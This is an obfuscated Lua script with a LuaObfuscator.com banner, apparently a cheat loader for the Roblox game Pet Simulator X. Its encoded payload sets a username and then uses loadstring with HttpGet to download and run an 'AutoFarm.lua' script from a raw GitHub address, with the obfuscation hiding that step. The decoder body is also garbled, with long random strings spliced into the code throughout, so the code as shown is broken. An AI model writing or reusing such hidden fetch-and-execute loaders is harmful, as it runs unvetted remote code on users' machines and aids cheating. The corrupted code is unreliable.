--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v75=0;local v76;while true do if (0==v75) then v76=v2(v0(v20,16));if v19 then local v101=v5(v76,v19);v19=nil;return v101;else return v76;end break;end end end end);local function v21(v22,v23,v24)if v24 then local v77=(v22/((1 + 1)^(v23-1)))%((9 -7)^(((v24-(1 + (0 -0))) -(v23-1)) + ((1 + 0) -0))) ;return v77-(v77%(1 + 0)) ;else local v78=0 + 0 ;local v79;while true do if (v78==(746 -(331 + 415))) then v79=(129 -(4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV0) ;end end end end local function v25()local v38=v1(v16,v18,v18);v18=v18 + 1 ;return v38;end local function v26()local v39=0;local v40;local v41;while true do if (v39==(3 -2)) then return (v41 * (508 -252)) + v40 ;end if (v39==((350 + 238) -(31 + 8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA end end local function v27()local v42=0;local v43;local v44;local v45;local v46;while true do if (v42==1) then return (v46 * (57348040 -40570824)) + (v45 * (63216 + 2320)) + (v44 * (463 -(5 + 202))) + v43 ;end if (v42==(0 + 0)) then v43,v44,v45,v46=v1(v16,v18,v18 + (10 -7) );v18=v18 + 3 + 1 ;v42=1 + 0 + 0 ;end end end local function v28()local v47=1335 -(844 + 491) ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(8 -5)) then if (v52==(0 -0)) then if (v51==(0 -(0 -0))) then return v53 * ((327 -(235 + 48)) -(24 + 20)) ;else local v102=(3617 -2206) -(1358 + 53) ;while true do if (v102==(0 -0)) then v52=1;v50=0 + 0 ;break;end end end elseif (v52==(6917 -4870)) then return ((v51==0) and (v53 * ((1 + 0)/(795 -(70 + 725))))) or (v53 * NaN) ;end return v8(v53,v52-(901 + 122) ) * (v50 + (v51/((802 -(4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV402 -(68 + 333)) + 0 ;end if ((1056 -(598 + 457))==v47) then v50=1114 -(801 + 312) ;v51=(v21(v49,2 -1 ,20) * ((1 + 0 + 1)^(945 -(571 + 342)))) + v48 ;v47=1 + 1 + 0 ;end if (v47==(607 -(8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA + 925))) and  -(2 -1)) or (14 -(10 + 3)) ;v47=962 -(577 + 382) ;end end end local function v29(v30)local v54=0;local v55;local v56;while true do if (v54==(1 + 0)) then v55=v3(v16,v18,(v18 + v30) -(1811 -(258 + 1552)) );v18=v18 + v30 ;v54=2;end if (v54==(1 + 2)) then return v6(v56);end if (v54==(0 -0)) then v55=nil;if  not v30 then v30=v27();if (v30==0) then return "";end end v54=(379 + 99) -(4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVdo v56[v80]=v2(v1(v3(v55,v80,v80)));end v54=3 -(516 -(444 + 72)) ;end end end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v57=0;local v58;local v59;local v60;local v61;local v62;local v63;local v64;local v65;while true do if (v57==(0 -0)) then v58=0;v59=nil;v57=4 -3 ;end if (v57==(1 -0)) then v60=nil;v61=nil;v57=4 -2 ;end if (v57==(330 -(276 + 52))) then v62=nil;v63=nil;v57=3 + 0 ;end if (v57==(4 -1)) then v64=nil;v65=nil;v57=1565 -(1377 + 184) ;end if ((214 -(146 + 64))~=v57) then else while true do if (v58==(1702 -(1074 + 625))) then v65=nil;while true do local v103=0 -0 ;local v104;while true do if ((0 -0)==v103) then v104=0 -0 ;while true do if (v104==(1 + 0)) then if (v59==(1057 -(1047 + 9))) then local v112=0;local v113;while true do if (v112==(0 + 0)) then v113=0 -0 ;while true do if ((1 -0)==v113) then for v148=1 + 0 ,v64 do local v149=1517 -(614 + 903) ;local v150;local v151;local v152;local v153;while true do if (v149==(0 + 0)) then v150=0 -0 ;v151=nil;v149=1742 -(1003 + 738) ;end if ((384 -(38 + 345))==v149) then v152=nil;v153=nil;v149=5 -3 ;end if (v149==2) then while true do if (v150~=(0 -0)) then else local v166=0;while true do if (v166==1) then v150=1 -0 ;break;end if (v166==(1739 -(641 + 1098))) then v151=0;v152=nil;v166=1 + 0 ;end end end if (v150==1) then v153=nil;while true do if (v151~=0) then else local v175=858 -(620 + 238) ;local v176;while true do if (v175~=0) then else v176=0 -0 ;while true do if (v176==(0 -0)) then v152=v25();v153=nil;v176=2 -1 ;end if (v176~=(68 -(30 + 37))) then else v151=269 -(229 + 39) ;break;end end break;end end end if (v151~=(1 + 0)) then else if (v152==1) then v153=v25()~=(0 + 0) ;elseif (v152==(2 -0)) then v153=v28();elseif (v152==(2 + 1)) then v153=v29();end v65[v148]=v153;break;end end break;end end break;end end end v63[3]=v25();v113=97 -(30 + 65) ;end if ((1348 -(645 + 701))~=v113) then else v59=2;break;end if (v113==(0 -0)) then local v146=0 -0 ;while true do if (v146==(0 -0)) then v64=v27();v65={};v146=1 + 0 ;end if (1==v146) then v113=2 -1 ;break;end end end end break;end end end break;end if (v104==(0 + 0)) then local v111=0;while true do if (v111==(0 + 0)) then if (v59==(9 -7)) then local v115=0;local v116;while true do if (v115==(0 + 0)) then v116=0 -0 ;while true do local v154=0;local v155;while true do if (v154==(828 -(521 + 307))) then v155=0 + 0 ;while true do if (v155==0) then if ((1137 -(623 + 514))==v116) then for v178=647 -(553 + 93) ,v27() do local v179=0 -0 ;local v180;local v181;local v182;while true do if (v179==0) then v180=0 + 0 ;v181=nil;v179=172 -(160 + 11) ;end if ((1 + 0)==v179) then v182=nil;while true do if (v180==0) then local v192=312 -(51 + 261) ;local v193;while true do if ((0 -0)==v192) then v193=180 -(109 + 71) ;while true do if (v193~=(2 -1)) then else v180=1594 -(1345 + 248) ;break;end if ((0 + 0)==v193) then v181=0 -0 ;v182=nil;v193=1 + 0 ;end end break;end end end if (v180==(1294 -(388 + 905))) then while true do if (v181==(168 -(164 + 4))) then v182=v25();if (v21(v182,1 + 0 ,2 -1 )==0) then local v197=0;local v198;local v199;local v200;local v201;local v202;while true do if (v197==(1865 -(1142 + 722))) then v200=nil;v201=nil;v197=1676 -(1496 + 178) ;end if (v197~=(2 + 0)) then else v202=nil;while true do if (v198~=(1426 -(717 + 707))) then else while true do if (v199~=(258 -(162 + 95))) then else local v204=0 -0 ;local v205;while true do if (v204~=(0 -0)) then else v205=1529 -(1007 + 522) ;while true do if (v205==(1159 -(25 + 1134))) then local v215=1311 -(386 + 925) ;local v216;while true do if (v215==(0 + 0)) then v216=0 + 0 ;while true do if (v216~=(1436 -(601 + 835))) then else local v217=1915 -(1504 + 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVthen local v218=541 -(10 + 531) ;local v219;while true do if (v218~=0) then else v219=0 + 0 ;while true do if (v219==(0 -0)) then v202[12 -9 ]=v26();v202[1414 -(1032 + 378) ]=v26();break;end end break;end end elseif (v200==(1 + 0)) then v202[1 + 2 ]=v27();elseif (v200==(1350 -(1077 + 271))) then v202[1733 -(305 + 1425) ]=v27() -((2 + 0)^(11 + 5)) ;elseif (v200==3) then local v224=0 + 0 ;local v225;while true do if (v224==(0 -0)) then v225=0 + 0 ;while true do if (v225==(88 -(60 + 28))) then v202[336 -(73 + 260) ]=v27() -(2^16) ;v202[1060 -(56 + 1000) ]=v26();break;end end break;end end end v217=1 + 0 ;end if (v217~=1) then else v216=1684 -(1065 + 618) ;break;end end end if (v216==(1835 -(883 + 951))) then v205=1;break;end end break;end end end if (v205==(1 -0)) then v199=392 -(101 + 289) ;break;end end break;end end end if (2~=v199) then else local v206=0 + 0 ;while true do if (v206~=0) then else if (v21(v201,1 + 0 ,1)==(2 -1)) then v202[2]=v65[v202[1705 -(705 + 998) ]];end if (v21(v201,6 -4 ,1 + 1 )~=1) then else v202[14 -11 ]=v65[v202[1581 -(929 + 649) ]];end v206=1;end if (v206==1) then v199=3;break;end end end if (v199==(1643 -(1220 + 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVv21(v182,4,14 -8 );v207=1186 -(1151 + 34) ;end if (v207==(1 + 0)) then v199=3 -2 ;break;end end end if (v199~=(1251 -(273 + 975))) then else if (v21(v201,1520 -(1480 + 37) ,1249 -(89 + 1157) )~=(1361 -(8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA (v198==(1002 -(820 + 182))) then local v203=0;while true do if (v203==(1 + 0)) then v198=1 + 0 ;break;end if (v203~=(0 + 0)) then else v199=0 + 0 ;v200=nil;v203=1 -0 ;end end end if (v198==(1 + 0)) then v201=nil;v202=nil;v198=2 + 0 ;end end break;end if (v197==(0 -0)) then v198=0 -0 ;v199=nil;v197=1;end end end break;end end break;end end break;end end end for v183=1 + 0 ,v27() do v61[v183-(1 + 0) ]=v33();end v116=1770 -(1415 + 354) ;end if (v116==(1 -0)) then local v170=0 + 0 ;local v171;while true do if (v170==(1575 -(123 + 1452))) then v171=144 -(104 + 40) ;while true do if (v171==(0 -0)) then local v187=0 -0 ;while true do if (v187==(0 + 0)) then for v195=1 + 0 ,v27() do v62[v195]=v27();end return v63;end end end end break;end end end break;end end break;end end end break;end end end if ((1392 -(160 + 1232))~=v59) then else local v117=904 -(69 + 835) ;local v118;while true do if (0~=v117) then else v118=0 -0 ;while true do if (v118==1) then local v156=0;while true do if (v156~=(0 -0)) then else v62={};v63={v60,v61,nil,v62};v156=94 -(43 + 50) ;end if (v156~=(1 -0)) then else v118=2 -0 ;break;end end end if ((206 -(81 + 125))==v118) then v60={};v61={};v118=1;end if (v118~=(2 + 0)) then else v59=1;break;end end break;end end end v111=1;end if (v111==(4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV2) then local v92=8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA~=0) then else v63=nil;v64=nil;v93=1 + 0 ;end if (v93==(196 -(27 + 168))) then v58=6 -3 ;break;end end break;end end end if ((1009 -(800 + 209))==v58) then local v94=937 -(880 + 57) ;while true do if (v94~=(0 -0)) then else v59=0;v60=nil;v94=1 -0 ;end if (v94~=(1 -0)) then else v58=1;break;end end end if (v58==(2 -1)) then local v95=0 + 0 ;local v96;while true do if (v95==0) then v96=498 -(26 + 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV0==v109) then v61=nil;v62=nil;v109=1813 -(949 + 863) ;end if (v109~=1) then else v96=1 -0 ;break;end end end if (v96==1) then v58=435 -(90 + 343) ;break;end end break;end end end end break;end end end local function v34(v35,v36,v37)local v66=v35[1];local v67=v35[2];local v68=v35[3];return function(...)local v69=0;local v70;local v71;local v72;local v73;local v74;while true do if (v69==3) then A,B=v32(v11(v74));if  not A[1] then local v97=v35[4][v70] or "?" ;error("Script error at ["   .. v97   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v69==0) then v70=1;v71= -1;v69=1;end if (v69==1) then v72={...};v73=v12("#",...) -1 ;v69=2;end if (v69==2) then v74=nil;v74=function()local v82=v66;local v83=v67;local v84=v68;local v85=v32;local v86={};local v87={};local v88={};for v98=0 -0 ,v73 do if ((v98>=v84) or ((978 -(123 + 22 + 353))==(1007 + 170 + 1359))) then v86[v98-v84 ]=v72[v98 + 1 + 0 ];else v88[v98]=v72[v98 + 1 + 0 ];end end local v89=(v73-v84) + 1 + 0 ;local v90;local v91;while true do local v99=1333 -(45 + 1288) ;local v100;while true do if (((5864 -(256 + 1295))==(6058 -(196 + 1549))) and (v99==(820 -(519 + 301)))) then v100=0 + 0 ;while true do if (((1712 + 3187)==(17671 -12772)) and (v100==(1 + 0))) then if (((1733 + (8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA<=(1 + (0 -0))) or ((2295 -(529 + 542))<(4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVthen local v119=0 + 0 ;local v120;local v121;local v122;local v123;while true do if (((2520 -(277 + (1596 -(783 + 145))))==((3228 + 174) -(364 + 1463))) and (v119==(0 + 0))) then v120=0 + 0 ;v121=nil;v119=1 + 0 ;end if (((1494 -(54 + 1120))<=(3376 -1991)) and (v119==(1 + 1))) then while true do if ((v120==(4 -3)) or ((3704 -2126)<=(148 -87))) then v123=nil;while true do if (((107 -(27 + 79))==v121) or (966>(5404 -(164 + 171 + 1119)))) then v88[v122 + 1 + (0 -0) ]=v123;v88[v122]=v123[v90[(1520 -(1039 + 401)) -(17 + 59) ]];break;end if ((v121==((0 -0) -0)) or ((8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA (((887 -316)==(59 + 512)) and (v164==(0 -(0 -0)))) then v165=0 + 0 ;while true do if ((v165==(2 -1)) or ((1179 -818)>(3778 -((1976 -1365) + 23)))) then v121=1 + 0 ;break;end if (((3646 -(2018 + 18))<(2885 -((2193 -(1212 + 573)) + 84))) and (v165==(810 -(76 + 2 + 732)))) then local v185=0 + 0 + 0 ;while true do if (((3535 + 89)<(5064 -(66 + 39))) and (v185==(1 + 0))) then v165=1;break;end if ((v185==(0 + 0 + 0)) or (((5287 -3041) -(99 + 85))<=(82 + 1852))) then v122=v90[3 -1 ];v123=v88[v90[1999 -((3776 -(468 + 1469)) + 63 + 94) ]];v185=1900 -((1061 -727) + (4693 -3128)) ;end end end end break;end end end end break;end if (((170 + (1478 -597))<=((5814 -3498) -(43 + 98))) and (v120==((0 -0) + (1999 -(39 + 1960))))) then v121=0 -0 ;v122=nil;v120=1799 -(1348 + 450) ;end end break;end if (((197 + 579)==(110 + 666)) and (v119==(1 + 0 + (1836 -(102 + 1734))))) then v122=nil;v123=nil;v119=2;end end elseif ((v88[v90[1753 -(89 + 1662) ]]==v90[3 + 1 + 0 ]) or ((2369 -(882 + 957))==((2675 -1122) -((1322 -(210 + 933)) + 83)))) then v70=v70 + (2 -1) ;else v70=v90[(1484 -(1057 + 8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA[162 -(60 + 100) ]]=v90[3 + 0 ];elseif ((148<(2618 -(250 + 516))) and (v91>(11 -8))) then do return;end else v88[v90[2 + 0 ]]=v37[v90[2 + 1 ]];end elseif ((v91<=(565 -(449 + 109))) or ((4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVv91<=(4 + 1))) then local v126=0 + (1685 -(593 + 1092)) ;local v127;local v128;while true do if (((1250 -((2132 -974) + 91))==v126) or ((12687 -(12184 -3254))<(6380 -3640))) then while true do if (((829 -((4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVv128=v90[1710 -(571 + 1137) ];v88[v128]=v88[v128](v13(v88,v128 + (286 -(170 + 32 + 83)) ,v71));break;end end break;end if (((5115 -2328)==(4503 -(1667 + 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV88))<=((3525 -(61 + 906)) -1787)) and (v147==(0 -0))) then v127=0 + (0 -0) ;v128=nil;v147=1 + (0 -0) ;end if ((v147==(1 + 0)) or ((2303 -(382 + 1394))==(6592 -4567))) then v126=3 -2 ;break;end end end end elseif (((5058 -(330 + (960 -517)))>(476 + 3452)) and (v91==6)) then v70=v90[3 + 0 ];else local v137=0 -0 ;local v138;local v139;local v140;local v141;local v142;local v143;while true do if ((v137==(1208 -(1172 + (140 -(49 + 58))))) or ((6485 -(893 + 939))<(2168 + 974))) then while true do if (((2277 + (2288 -(1173 + 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV321 -(5 + 96))) and ((1743 -(1653 + 90))==v139)) then local v167=0 -0 ;local v168;while true do if (((72 + 1335 + 3150)>(1744 + 2057)) and (v167==((3471 -2475) -(773 + 223)))) then v168=(107 + 209) -(5 + 17 + 294) ;while true do if ((v168==(0 + 0)) or (((10282 -(328 + 133)) -(8124 -(1205 + 459)))<(84 + 1593))) then local v186=0 + 0 ;while true do if ((v186==(1 + 0)) or ((4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVbreak;end if (((629 -(67 + 562))==v186) or ((1423 + 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV1 + 0 ,v90[11 -8 ])));v186=2 -1 ;end end end if ((v168==1) or ((5866 -1723)<((3137 -(40 + 100)) + 99))) then v139=1 + 0 ;break;end end break;end end end if ((v139==(1829 -((876 -(104 + 305)) + 1360))) or (4346<=(4457 -2625))) then for v172=v140,v71 do local v173=0 + 0 ;local v174;while true do if (((3753 + 823)<(5410 -(367 + 169))) and ((262 -(13 + 3 + 246))==v173)) then v174=992 -(429 + 563) ;while true do if (((878 + 967)<2605) and (v174==(0 -0))) then v143=v143 + (4 -(689 -(83 + 603))) ;v88[v172]=v141[v143];break;end end break;end end end break;end if (((2377 -(674 + 773))>(2191 -((2802 -(1331 + 109)) + 112))) and (v139==1)) then local v169=1029 -(764 + 265) ;while true do if (((8384 -6041)>((3596 -(18 + 533)) -(557 + 230))) and (v169==(0 -0))) then v71=(v142 + v140) -(2 -1) ;v143=(1672 + 23) -((2287 -(696 + 919)) + 1023) ;v169=1 + 0 ;end if (((39 + 10)==(1003 -((357 -179) + 425 + 351))) and (v169==(1 -0))) then v139=1 + 0 + 1 ;break;end end end end break;end if (((9548 -6993)>=((1966 -964) + (880 -280))) and (v138==(1 + 0))) then local v159=0 -0 ;while true do if ((((1030 -(984 + 7)) + (4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV369 -269) + (787 -(531 + 214))) ;end if (((2339 + (1619 -(962 + 554)))==(4733 -2291)) and (v159==(67 -(22 + (90 -8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA -(207 + 274))))) and (v138==(316 -(138 + 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVthen v138=1;break;end if ((((5952 -(64 + 98)) -(5258 -(1724 + 38)))<(14 + 4003)) and (v160==((0 + 0) -0))) then v139=0 + 0 ;v140=nil;v160=1 + 0 ;end end end end break;end if ((v137==(2 -0)) or ((2230 -(595 + 944))==713)) then v142=nil;v143=nil;v137=3;end if ((v137==(1 + (1598 -(772 + 826)))) or ((1642 -(2268 -(503 + 821)))>=((1638 + 2204) -(1125 + 584)))) then v140=nil;v141=nil;v137=1838 -(1146 + 690) ;end if ((v137==(0 + 0)) or (((598 -8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA (((3402 -1902)>(5126 -3726)) and (v91<=(1252 -(1062 + 182)))) then v88[v90[677 -(194 + 481) ]][v90[587 -(28 + 556) ]]=v88[v90[2 + 2 ]];elseif (((367 -(1826 -(1513 + 70)))<=(8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA + 63) ]]=v90[5 -2 ]~=(1509 -(130 + 108 + 1271)) ;end v70=v70 + 1 + 0 ;break;end if (((998 + (686 -4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVtrue do if (((1995 + 1881)==(9034 -5158)) and (v110==(1 + 0))) then v100=1;break;end if ((((71 -41) + 252 + 363)==645) and ((0 + 0)==v110)) then local v114=0 -0 ;while true do if (((2960 + (2874 -(615 + 1156)))==(1082 + 2981)) and ((2 -1)==v114)) then v110=1 -0 ;break;end if ((v114==(0 + 0)) or ((1081 + 1577)==(12855 -(16361 -7032)))) then v90=v82[v70];v91=v90[828 -(8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA end;end return v34(v33(),{},v17)(...);end v15("LOL!083O00028O0003023O005F4703083O00557365726E616D6503083O005461636F31353935030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F7258536372697074732F6D61696E2F4175746F4661726D2E6C756100113O0012023O00013O0026013O0001000100010004063O00010001001203000100023O001203000200043O001008000100030002001203000100053O001203000200063O00202O000200020007001202000400084O0009000500014O0007000200054O000500013O00022O000A0001000100010004063O001000010004063O000100012O00043O00017O00113O00023O00043O00043O00053O00053O00053O00063O00063O00063O00063O00063O00063O00063O00063O00073O00083O000A3O00",v9(),...);end
